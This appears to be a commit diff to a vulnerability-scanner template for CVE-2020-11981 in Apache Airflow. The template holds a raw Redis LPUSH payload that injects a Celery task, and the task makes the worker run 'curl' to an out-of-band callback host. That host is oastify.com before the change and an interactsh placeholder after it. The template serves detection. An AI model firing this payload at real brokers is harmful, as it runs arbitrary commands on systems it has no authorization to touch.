minor -update

network/cves/2020/CVE-2020-11981.yaml

@@ -8,6 +8,7 @@ info:
     An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.
   reference:
     - https://github.com/apache/airflow/pull/9178
+    - https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981
   metadata:
     verified: "true"
     shodan-query: product:"redis"
@@ -15,12 +16,13 @@ info:
 
 variables:
   data: "*3\r\n$5\r\nLPUSH\r\n$7\r\ndefault\r\n$936\r\n{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \""
-  encode: '[[["curl", "xxx.oastify.com"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]'
+  encode1: '[[["curl", "http://'
+  encode2: '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]'
   end: '"}'
 
 tcp:
   - inputs:
-      - data: "{{data+base64(encode)+concat(end+ '\r\n')}}"
+      - data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r\n')}}"
         read: 1024
     host:
       - "{{Hostname}}"